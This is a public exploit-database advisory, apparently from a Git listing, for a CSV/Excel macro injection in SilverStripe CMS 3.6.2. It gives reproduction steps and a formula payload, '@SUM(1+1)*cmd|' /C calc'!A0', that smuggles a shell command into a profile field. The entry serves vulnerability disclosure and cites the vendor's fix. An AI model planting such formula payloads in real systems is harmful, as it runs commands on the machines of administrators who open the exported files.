b91055c9da
8 changes to exploits/shellcodes GetGo Download Manager 5.3.0.2712 - Buffer Overflow Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation COMTREND ADSL Router CT-5367 - Remote Code Execution Joomla! Component JEXTN FAQ Pro 4.0.0 - 'id' SQL Injection Biometric Shift Employee Management System 3.0 - Local File Disclosure Sendroid < 6.5.0 - SQL Injection SilverStripe CMS 3.6.2 - CSV Excel Macro Injection Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection
36 lines
No EOL
1.3 KiB
Text
36 lines
No EOL
1.3 KiB
Text
Exploit Title: SilverStripe CMS - 3.6.2 CSV Excel Macro Injection
|
|
Vendor Homepage: https://www.silverstripe.org/
|
|
Software Link: https://www.silverstripe.org/download
|
|
Discovered by: Ishaq Mohammed
|
|
Contact: https://twitter.com/security_prince
|
|
Website: https://about.me/security-prince
|
|
Category: web apps
|
|
Platform: PHP
|
|
|
|
Description:
|
|
|
|
In the CSV export feature of the SilverStripe CMS, it's possible for the
|
|
output to contain macros and scripts, which if imported without
|
|
sanitization into software (including Microsoft Excel) may be executed.
|
|
|
|
Proof of Concept
|
|
Steps to Reproduce:
|
|
|
|
1. Login with normal user's credentials
|
|
2. Access the below URL via your browser:
|
|
http://localhost/SilverStripe/admin/myprofile
|
|
3. Enter the below payload in the "First Name" field and save the profile"
|
|
@SUM(1+1)*cmd|' /C calc'!A0
|
|
4. Log in with admin's credentials on a different browser
|
|
5. Access te security page at the below link:
|
|
http://localhost/SilverStripe/admin/security/
|
|
6. Click on "Export to CSV" option and open the exported CSV file in any
|
|
Spreadsheet application
|
|
|
|
|
|
Solution:
|
|
The issue has been fixed in the latest release of SilverStripe which can be
|
|
downloaded from here: https://www.silverstripe.org/download
|
|
|
|
Reference:
|
|
https://www.silverstripe.org/download/security-releases/ss-2017-007 |